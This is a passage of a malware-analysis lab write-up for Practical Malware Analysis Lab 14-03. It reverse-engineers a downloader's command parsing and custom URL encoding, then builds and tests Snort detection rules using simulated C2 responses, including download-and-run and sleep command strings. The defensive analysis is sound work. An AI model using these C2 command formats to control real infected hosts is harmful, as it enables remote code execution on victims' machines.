When the malware receives input, what checks are performed on the input to determine whether it is a valid command? How does the attacker hide the list of commands the malware is searching for?
Answer 4
Based on the above analysis we know that the malware receives input from the C2 and looks for the presence of <noscript> followed by the expected domain it is fetching (e.g. http://www.practicalmalwareanalysis.com/), a command, and the number 96. If we examine sub_401684, which is passed the URL we found previously, we can see that it uses ‘strtok’ to tokenise (break apart) the URL before checking whether the command begins with the character ‘d’.
This comes in the form of a switch whereby case ‘0’ (loc_4016E9) is run when it finds the value ‘d’. This comparison looks at the first byte of the first token. The switch then uses a table at byte_40173E as an index into the jump offsets stored at ‘off_40172A’.
The calculations that translate these offsets into values can be confusing, as the switch uses an index table to determine which case to jump to. An easier way to understand this is to view byte_40173E as undefined data, which reveals the following mapping.
Essentially if the character sent is 10 higher than ‘d’, the switch case to run is ‘1’. If the character sent is 14 higher than ‘d’ the switch case to run is 2. If the character sent is 15 higher than ‘d’ the switch case to run is 3. Otherwise the switch case to run is 4.
Adding these onto ‘d’ (4) you get ‘n’ (14), ‘r’ (18), and ‘s’ (19) respectively.
These cases take an input which is only evaluated from the first character in the command sent from the server. So in this case any word starting with ‘d’, ‘n’, ‘r’, or ‘s’ can be sent to run a command through this malware.
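A short Python model makes the lookup easier to follow. The 16-entry table below is rebuilt from the offsets described above rather than dumped from the binary. The bounds check is our assumption about how characters outside ‘d’ to ‘s’ reach the default case. Treat this as a sketch of the logic, not a copy of the disassembly.

```python
# Hypothetical reconstruction of byte_40173E, inferred from the offsets described
# above: entry i holds the switch case for the character chr(ord('d') + i).
TABLE_SIZE = 16  # covers 'd' (offset 0) through 's' (offset 15)
KNOWN_CASES = {0: 0, 10: 1, 14: 2, 15: 3}  # 'd', 'n', 'r', 's'
DEFAULT_CASE = 4

byte_table = [KNOWN_CASES.get(i, DEFAULT_CASE) for i in range(TABLE_SIZE)]


def select_case(command: str) -> int:
    """Pick a switch case using only the first character of the command token."""
    offset = ord(command[0]) - ord("d")
    # Assumed bounds check: anything before 'd' or after 's' takes the default case.
    if not 0 <= offset < TABLE_SIZE:
        return DEFAULT_CASE
    return byte_table[offset]


for word in ("doctor", "nap", "real", "security", "Security", "xyz"):
    print(f"{word!r} -> case {select_case(word)}")
```

Running it shows that ‘Security’ (capital ‘S’) falls through to case 4. This matters later when we test our signatures.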
Question 5
What type of encoding is used for command arguments? How is it different from Base64, and what advantages or disadvantages does it offer?
Answer 5
Examining ‘loc_40170E’, we find that it runs ‘sub_401651’, which calls what looks to be a decoding routine at ‘sub_401147’. This routine does not follow Base64’s pattern of turning every 3 bytes into 4 characters, which tells us the encoding is non-standard. Instead, it calls ‘strlen’ to get the length of the encoded string and then loops over it. On each pass, ‘ebp+var_4’ increases by 1 and ‘ebp+var_8’ increases by 2.
Next, look at what we would normally expect to be the Base64 index string. It is too short: Base64 needs 64 characters, whereas this string has only 39 (‘/’, the 26 lowercase letters, the 10 digits, ‘:’ and ‘.’). Closer analysis shows that the routine takes two characters at a time, turns them into a number, and uses that number as an index into the string below.
/abcdefghijklmnopqrstuvwxyz0123456789:.
An advantage of this scheme is that it is non-standard, so it isn’t easily fingerprinted and would need to be reversed. A disadvantage is that it is fairly basic. Once we understand it, we can create robust signatures in later questions, because URLs have a predictable structure.
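The decoding loop can be sketched in Python as below. The sketch assumes each pair of characters is read as a decimal number. The encoded value of ‘http://’ later in this write-up supports this, since ‘:’ appears as 37. The errors raised for odd-length or out-of-range input are our own addition. We have not confirmed how the malware itself handles such input.

```python
# Index string recovered from sub_401147.
INDEX_STRING = "/abcdefghijklmnopqrstuvwxyz0123456789:."


def decode(encoded: str) -> str:
    """Read two decimal digits at a time and map each number to a character."""
    if len(encoded) % 2:
        raise ValueError("encoded argument must have an even number of digits")
    out = []
    for i in range(0, len(encoded), 2):
        index = int(encoded[i:i + 2])  # e.g. "08" -> 8
        if index >= len(INDEX_STRING):
            raise ValueError(f"index {index} is outside the index string")
        out.append(INDEX_STRING[index])
    return "".join(out)


print(decode("08202016370000"))  # http://
```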
Question 6
What commands are available to this malware?
Answer 6
To determine what commands are available to this malware, we need to look into the subroutines called from ‘sub_401684’. Recalling the jump table we identified in Question 4, the possible cases and their triggers are shown below.
- Case 0 (d): loc_4016E9
- Case 1 (n): loc_4016F7
- Case 2 (r): loc_40170E
- Case 3 (s): loc_401700
- Case 4 (other): loc_401723
Note that this order differs slightly from the left-to-right order in which IDA displays the cases.
Of the four command letters, three cause a subroutine to be called. The fourth (‘n’) just updates a variable, which is then used to exit the C2 loop and therefore the program. The subroutines and their trigger letters are shown below.
- d: sub_401565
- n: NO SUBROUTINE (quit)
- r: sub_401651
- s: sub_401613
Examining sub_401565 (d) gives a clear indication that it takes an argument and uses it to download and run another application. It also calls ‘sub_401147’, so we know the argument is encoded with the previously identified scheme.
Examining sub_401613 (s) shows that it is a simple sleep function. It sleeps for 20,000 milliseconds (20 seconds) if no argument is given; otherwise, it sleeps for the number of seconds sent as the argument.
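The sleep behaviour can be summarised as a small Python function. It assumes that a numeric argument is a whole number of seconds, converted to milliseconds before the sleep call. The function name is hypothetical. Non-numeric arguments are not modelled; here `int()` would simply raise a `ValueError`.

```python
from typing import Optional

DEFAULT_SLEEP_MS = 20_000  # used when the 's' command carries no argument


def sleep_duration_ms(argument: Optional[str]) -> int:
    """Return how long the 's' handler would sleep, in milliseconds.

    Assumption: the argument is a count of seconds converted to milliseconds.
    """
    if not argument:
        return DEFAULT_SLEEP_MS
    return int(argument) * 1000


print(sleep_duration_ms(None))   # 20000
print(sleep_duration_ms("200"))  # 200000
```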
By examining sub_401651 (r) we can see that this has a call to ‘sub_401147’ to decode any provided URL, before calling ‘sub_401372’ which we identified in question 2 as being responsible for updating the C2 configuration file.
Putting this all together we know what commands are available to this malware.
Question 7
What is the purpose of this malware?
Answer 7
Based on the commands available to this malware, we can conclude that it is a dropper, or more specifically a downloader and launcher. Traditional throwaway droppers may exist only to drop a payload before removing themselves. This malware differs in that it sets up persistence, so further malware can be downloaded and its C2 changed over time.
Question 8
This chapter introduced the idea of targeting different areas of code with independent signatures (where possible) in order to add resiliency to network indicators. What are some distinct areas of code or configuration data that can be targeted by network signatures?
Answer 8
The malware has several static or predictable elements:
- a custom but simple encoding scheme
- static but configurable domain names
- a malformed (duplicated) User-Agent header
- other static elements, such as the format of commands sent via the C2

We can use all of this to create specific Snort rules to identify it. As we are focussing on network signatures, we can target the initial beacon of the malware and the subsequent commands sent down via the web-based C2.
Question 9
What set of signatures should be used for this malware?
Answer 9
Expanding on the above, we can split this section into identifying the initial beacon, and then the subsequent C2 commands before testing our rules.
Beacon:
We gathered the static elements of this beacon in Question 1. The specific headers are listed below.
- Accept-Language
- UA-CPU
- User-Agent
- Accept
- Accept-Encoding
Because we can specify the C2 with autobat.exe, we can modify this to point to our own system. Given we’ve already defined ‘CYBERAIJU’ to point to one of our controlled hosts, let’s continue to use this, and create a Snort rule based on all the hardcoded elements of this beacon.
Restricting the rule to a single hardcoded element would be trivial. However, to identify every static element of this beacon for a high-confidence hit, we have included all of them in our Snort rule.
Side Note: Because the headers span multiple lines, the hex ‘0D 0A’ (carriage return, line feed) must be used for each line break. Many other special characters also need to be converted to hex. For example, ‘;’ must be written as |3B|, because otherwise it ends the Snort rule option.
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"PMA Lab14-03 Duplicate User-Agent and known hardcoded headers"; flow:to_server; content:"Accept|3A 20|*/*|0D 0A|Accept-Language|3A 20|en-US|0D 0A|UA-CPU|3A 20|x86|0D 0A|Accept-Encoding|3A 20|gzip|2C 20|deflate|0D 0A|User-Agent|3A 20|User-Agent|3A 20|Mozilla/4.0|20|(compatible|3B 20|MSIE|20|7.0|3B 20|Windows|20|NT|20|5.1|3B 20|.NET|20|CLR|20|3.0.4506.2152|3B 20|.NET|20|CLR|20|3.5.30729)"; http_header; classtype:trojan-activity; sid:1337351; rev:1;)
The end result is a thorough Snort rule which identifies this malware beacon.
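Before loading the rule into Snort, it can help to sanity-check the hex escapes. A small Python helper can turn a content string back into the bytes it matches. This helper is our own sketch, not part of Snort. It only handles |..| hex blocks and ignores backslash escapes.

```python
def snort_content_to_bytes(content: str) -> bytes:
    """Convert a Snort content string with |..| hex blocks into raw bytes.

    Text outside the pipes is literal ASCII; text inside is space-separated hex.
    Backslash escapes are not handled in this sketch.
    """
    parts = content.split("|")
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced '|' in content string")
    out = bytearray()
    for i, part in enumerate(parts):
        # Even-numbered parts sit outside the pipes, odd-numbered parts inside them.
        out += part.encode("ascii") if i % 2 == 0 else bytes.fromhex(part)
    return bytes(out)


# The content string from the beacon rule, split across lines for readability.
BEACON_CONTENT = (
    "Accept|3A 20|*/*|0D 0A|Accept-Language|3A 20|en-US|0D 0A|"
    "UA-CPU|3A 20|x86|0D 0A|Accept-Encoding|3A 20|gzip|2C 20|deflate|0D 0A|"
    "User-Agent|3A 20|User-Agent|3A 20|Mozilla/4.0|20|(compatible|3B 20|MSIE|20|7.0|3B 20|"
    "Windows|20|NT|20|5.1|3B 20|.NET|20|CLR|20|3.0.4506.2152|3B 20|.NET|20|CLR|20|3.5.30729)"
)

print(snort_content_to_bytes(BEACON_CONTENT).decode("ascii"))
```

The decoded output makes the duplicated ‘User-Agent: User-Agent:’ prefix easy to spot.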
Command Generic:
To test the Snort rules we create, we need to simulate a command being sent in response to the initial beacon. To do this, we can use the same netcat listeners as before and respond with content that the malware will treat as a command. To start, we know the general syntax of a command being sent:
<noscript><DYNAMICCONTENT>http://www.practicalmalwareanalysis.com/<COMMAND>/<ARG>96'
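To make this layout concrete, here is a hypothetical Python parser for a response in this format. It accepts any host in the URL, whereas the malware expects its configured URL. It also ends the argument at the first 96', which is our assumption about how the terminator is located.

```python
import re
from typing import Optional, Tuple

# <noscript>, arbitrary content, http://<host>/, then <COMMAND>/<ARG> ending in 96'
RESPONSE_RE = re.compile(
    r"<noscript>.*?http://[^/]+/(?P<command>[^/]+)/(?P<arg>[^/]*?)96'",
    re.DOTALL,
)


def parse_response(page: str) -> Optional[Tuple[str, str]]:
    """Return (command, argument) if the page carries a command, else None."""
    match = RESPONSE_RE.search(page)
    if match is None:
        return None
    return match.group("command"), match.group("arg")


print(parse_response("<noscript>sefgdgesgfhttp://CYBERAIJU/security/20096'"))
# ('security', '200')
```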
The consistent elements in this response are “<noscript>”, “http://”, and the closing “96'”, which we can chain together in a Snort rule:
alert tcp $HOME_NET any -> $HOME_NET any (msg:"PMA Lab14-03 C2 based on noscript tag and 96'"; content:"<noscript>"; content:"http|3A 2F 2F|"; distance:0; within:1024; content:"96'"; distance:0; within:1024; classtype:trojan-activity; sid:1337352; rev:1;)
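The relative matching in this rule (distance:0; within:1024) can be approximated in Python to see which payloads should fire. This is a simplified model, not Snort’s engine. It only tries the first occurrence of each earlier pattern. The test payload is a hypothetical example of the kind described below.

```python
from typing import Sequence


def chained_contents_match(payload: bytes, patterns: Sequence[bytes], within: int = 1024) -> bool:
    """Approximate a rule whose first content is unanchored and whose later
    contents each use distance:0 and within:<within>."""
    start = payload.find(patterns[0])
    if start == -1:
        return False
    cursor = start + len(patterns[0])
    for pattern in patterns[1:]:
        # distance:0 starts the search at the end of the previous match;
        # within:N requires the whole pattern to fit in the next N bytes.
        pos = payload[cursor:cursor + within].find(pattern)
        if pos == -1:
            return False
        cursor += pos + len(pattern)
    return True


RULE_CONTENTS = [b"<noscript>", b"http://", b"96'"]
test_payload = b"<noscript>sefgdgesgfhttp://CYBERAIJU/Security/20096'"
print(chained_contents_match(test_payload, RULE_CONTENTS))  # True
```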
Testing in the same way as before, we respond to the beacon received by our netcat listener with a test payload.
The end result is our rule being hit.
Note that in the test above we used the command ‘Security’. Because it starts with ‘s’, one might assume the malware would sleep. However, the check is case-sensitive, so ‘S’ does not trigger the sleep command. We need to keep this in mind for the coming rules, which aim to detect each command sent.
Command d or r:
Given our knowledge of the encoding algorithm, we can create a robust signature that looks for any command beginning with ‘d’ or ‘r’. We know that either of these commands must be followed by an encoded URL. The URL is encoded by mapping each character to its two-digit position in the string previously identified:
/abcdefghijklmnopqrstuvwxyz0123456789:.
Because every URL is expected to begin with ‘http://’, we only need to work out what ‘http://’ encodes to. Each character is represented by two digits giving its position in the string above. Positions start at ‘00’ for ‘/’ and increase by 1 for each subsequent character, so ‘http://’ encodes as shown below.
http://
08202016370000
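Running the same mapping in reverse gives an encoder, which we can use to confirm the value above. The sketch below is our own and is inferred from the decoding routine. Characters missing from the index string, such as uppercase letters, cannot be encoded, so a hostname would need to be written in lowercase.

```python
INDEX_STRING = "/abcdefghijklmnopqrstuvwxyz0123456789:."


def encode(text: str) -> str:
    """Encode each character as its two-digit position in INDEX_STRING."""
    # str.index raises ValueError for characters that are not in the index string.
    return "".join(f"{INDEX_STRING.index(ch):02d}" for ch in text)


print(encode("http://"))  # 08202016370000
```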
A test response would therefore look like either of the following, triggering the malware to run a ‘d’ or ‘r’ command respectively.
<noscript>sefgdgesgfhttp://CYBERAIJU/doctor/082020163700004123496'
<noscript>sefgdgesgfhttp://CYBERAIJU/real/082020163700004123496'
Turning this into a Snort rule we could use something like the below.
alert tcp $HOME_NET $HTTP_PORTS -> $HOME_NET any (msg:"PMA Lab14-03 C2 d or r command ran"; content:"|2F|08202016370000"; pcre:"/\/[dr][^\/]*\/08202016370000/"; classtype:trojan-activity; sid:1337353; rev:1;)
The end result is our rule being hit after testing as we did above.
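The pcre can also be checked offline against the test responses using Python’s `re` module. The `/.../` delimiters are dropped because Python patterns do not use them, and forward slashes need no escaping. The capitalised ‘Doctor’ case is a hypothetical negative test based on the case-sensitive check noted earlier.

```python
import re

# The pcre from the d/r rule, without its /.../ delimiters.
DR_COMMAND = re.compile(r"/[dr][^/]*/08202016370000")

test_cases = [
    ("<noscript>sefgdgesgfhttp://CYBERAIJU/doctor/082020163700004123496'", True),
    ("<noscript>sefgdgesgfhttp://CYBERAIJU/real/082020163700004123496'", True),
    # Capital 'D' does not trigger the download command, so the rule should stay quiet.
    ("<noscript>sefgdgesgfhttp://CYBERAIJU/Doctor/082020163700004123496'", False),
    ("<noscript>sefgdgesgfhttp://CYBERAIJU/security/20096'", False),
]

for payload, should_match in test_cases:
    matched = DR_COMMAND.search(payload) is not None
    print("ok  " if matched == should_match else "FAIL", payload)
```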
Command s:
The final piece of the puzzle is to alert when a sleep command is sent. As with the commands above, a test response could look like the following:
<noscript>sefgdgesgfhttp://CYBERAIJU/security/20096'
To detect this, we focus on a command beginning with ‘s’, followed by a numeric argument of up to 20 digits that is closed by our 96' signature.
alert tcp $HOME_NET $HTTP_PORTS -> $HOME_NET any (msg:"PMA Lab14-03 C2 sleep command ran"; content:"96'"; pcre:"/\/s[^\/]*\/[0-9]{0,20}96'/"; classtype:trojan-activity; sid:1337354; rev:1;)
The end result is our rule being hit after testing as we did above.
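Tying the digits to the 96' terminator matters because the content:"96'" match can be satisfied anywhere in the payload. The Python comparison below tests two expressions. The loose one makes the digits optional and does not link them to 96'. The anchored one requires the digits to be followed immediately by 96'. The benign HTML string is made up for illustration.

```python
import re

# Loose form: '/s...' then up to 20 digits, with nothing tying the digits to 96'.
LOOSE = re.compile(r"/s[^/]*/[0-9]{0,20}")
# Anchored form: the digits must be immediately followed by the 96' terminator.
ANCHORED = re.compile(r"/s[^/]*/[0-9]{0,20}96'")

sleep_command = "<noscript>sefgdgesgfhttp://CYBERAIJU/security/20096'"
# Hypothetical benign page containing a '/s.../' path and, separately, the text 96'.
benign_page = "<a href=/shop/sale>Longboards from 96' long</a>"

for name, text in (("sleep command", sleep_command), ("benign page", benign_page)):
    print(f"{name}: loose={bool(LOOSE.search(text))} anchored={bool(ANCHORED.search(text))}")
```

Both expressions match the sleep command. Only the loose one also matches the benign page, which would produce a false positive when combined with content:"96'".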
This concludes chapter 14, proceed to the next chapter.